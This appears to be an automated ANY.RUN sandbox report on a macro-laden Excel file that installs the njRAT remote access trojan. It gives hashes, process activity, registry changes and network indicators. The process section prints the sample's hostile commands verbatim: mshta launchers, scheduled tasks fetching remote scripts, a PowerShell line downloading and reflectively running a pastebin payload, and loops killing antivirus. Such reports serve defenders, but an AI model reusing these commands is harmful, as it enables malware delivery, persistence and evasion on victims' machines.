analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

62706e2512e5a7f369730cce4ab45d70703c762d8eb6dba7148b8099f7c39fac

Full analysis: https://app.any.run/tasks/fc4e953f-4a91-446b-9a08-9b6a72d5762c
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Analysis date: January 11, 2019, 04:33:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
rat
njrat
bladabindi
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GonzoMobzaluz, Last Saved By: GonzoMobzaluz, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 03:30:06 2018, Last Saved Time/Date: Wed Dec 19 03:42:50 2018, Security: 0
MD5:

47C3D3B14634C1B9FED79FC961F7DA0B

SHA1:

086463BAB82480E89A79722701DF1C543E378FDA

SHA256:

62706E2512E5A7F369730CCE4AB45D70703C762D8EB6DBA7148B8099F7C39FAC

SSDEEP:

1536:eDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAbdIxtckcfyKH+xDH8mCUO7xTvrsgR:eDZ+RwPONXoRjDhIcp0fDlaGGx+cL26x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2916)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2916)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2224)
    • Changes settings of System certificates

      • mshta.exe (PID: 2224)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2872)
      • schtasks.exe (PID: 3396)
    • Connects to CnC server

      • powershell.exe (PID: 2528)
    • NJRAT was detected

      • powershell.exe (PID: 2528)
  • SUSPICIOUS

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 2224)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • mshta.exe (PID: 1028)
    • Application launched itself

      • mshta.exe (PID: 1028)
    • Creates files in the user directory

      • mshta.exe (PID: 2224)
      • powershell.exe (PID: 2528)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2224)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3600)
    • Uses TASKKILL.EXE to kill process

      • forfiles.exe (PID: 3912)
      • forfiles.exe (PID: 3028)
      • forfiles.exe (PID: 3364)
      • forfiles.exe (PID: 3156)
      • cmd.exe (PID: 3600)
      • forfiles.exe (PID: 2140)
      • forfiles.exe (PID: 2256)
      • forfiles.exe (PID: 4052)
      • forfiles.exe (PID: 2524)
      • forfiles.exe (PID: 1228)
      • forfiles.exe (PID: 3416)
      • forfiles.exe (PID: 3728)
    • Executes PowerShell scripts

      • forfiles.exe (PID: 2188)
    • Connects to unusual port

      • powershell.exe (PID: 2528)
  • INFO

    • Creates files in the user directory

      • EXCEL.EXE (PID: 2916)
    • Reads internet explorer settings

      • mshta.exe (PID: 2224)
      • mshta.exe (PID: 1028)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2916)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2528)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Office Excel 2003 Worksheet
CompObjUserTypeLen: 38
HeadingPairs:
  • Worksheets
  • 3
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
Company: Grizli777
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2018:12:19 03:42:50
CreateDate: 2018:12:19 03:30:06
Software: Microsoft Excel
LastModifiedBy: GonzoMobzaluz
Author: GonzoMobzaluz
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
195
Monitored processes
159
Malicious processes
15
Suspicious processes
3

Behavior graph

Click at the process to see the details
start excel.exe no specs mshta.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs cmd.exe no specs forfiles.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs #NJRAT powershell.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
1028mshta vbscript:CreateObject("Wscript.Shell").Run("mshta http://www.bitly.com/lullimyra29",0,true)C:\Windows\system32\mshta.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2224"C:\Windows\System32\mshta.exe" http://www.bitly.com/lullimyra29C:\Windows\System32\mshta.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2872"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://b67x.blogspot.com/p/blog-page.html\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3356"C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3396"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 10 /tn "MS-OFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin.com/raw/urGHE2PF\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3428"C:\Windows\System32\cmd.exe" /C forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3600"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3912forfiles /c "taskkill /f /im AvastUi.exe" C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2188forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 383
Read events
1 187
Write events
188
Delete events
8

Modification events

(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:?}$
Value:
3F7D2400640B0000010000000000000000000000
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
Operation:writeName:MTTT
Value:
640B000054148FDB66A9D40100000000
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete valueName:?}$
Value:
3F7D2400640B0000010000000000000000000000
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete keyName:
Value:
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
Operation:delete keyName:
Value:
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2916) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\199E79
Operation:writeName:199E79
Value:
04000000640B00005B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0036003200370030003600650032003500310032006500350061003700660033003600390037003300300063006300650034006100620034003500640037003000370030003300630037003600320064003800650062003600640062006100370031003400380062003800300039003900660037006300330039006600610063002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0001000000000000001076BADD66A9D401799E1900799E190000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
0
Suspicious files
4
Text files
16
Unknown types
2

Dropped files

PID
Process
Filename
Type
2916EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR958F.tmp.cvr
MD5:
SHA256:
2528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DTO8ZWWAM11CILGY2LFG.temp
MD5:
SHA256:
2916EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFD4B27C6EAC610ABC.TMP
MD5:
SHA256:
2916EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\62706e2512e5a7f369730cce4ab45d70703c762d8eb6dba7148b8099f7c39fac.xls.LNKlnk
MD5:3BD65FA7B19CD742778408FAAA7D6915
SHA256:A53074894AF9A197D9F458AA04C45CFB1484B4AB063F63015C6F0E0BBF109D77
2224mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txttext
MD5:BC5C1B03980BF0B912EE015B07E229FA
SHA256:51A22674BED62808F7EF804C00B83DE0AABA12537F9CED3385A1FBE4EDF75A18
2224mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\error[1]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
2224mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\2727757643-css_bundle_v2[1].csstext
MD5:C6BEF00B7471799FB84ECD3C7D93B889
SHA256:797E19AC51BD552CB84849B171FAD7CF0563B4A14BDC3F751D1EDAC71064FF56
2528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19b702.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2528powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2224mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]text
MD5:35FE91C2AC1BA0913CC617622B9EB43F
SHA256:966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
10
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2224
mshta.exe
GET
301
67.199.248.14:80
http://bitly.com/lullimyra29
US
html
122 b
shared
2224
mshta.exe
GET
301
67.199.248.14:80
http://www.bitly.com/lullimyra29
US
html
178 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2528
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2224
mshta.exe
172.217.23.129:443
b67x.blogspot.com
Google Inc.
US
whitelisted
2224
mshta.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
2224
mshta.exe
216.58.207.73:443
www.blogger.com
Google Inc.
US
whitelisted
2528
powershell.exe
194.68.59.43:2445
Inleed AB
SE
malicious

DNS requests

Domain
IP
Reputation
www.bitly.com
  • 67.199.248.14
  • 67.199.248.15
shared
b67x.blogspot.com
  • 172.217.23.129
whitelisted
www.blogger.com
  • 216.58.207.73
shared
resources.blogblog.com
  • 216.58.207.73
whitelisted
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared

Threats

PID
Process
Class
Message
2224
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
2224
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
1 ETPRO signatures available at the full report
No debug info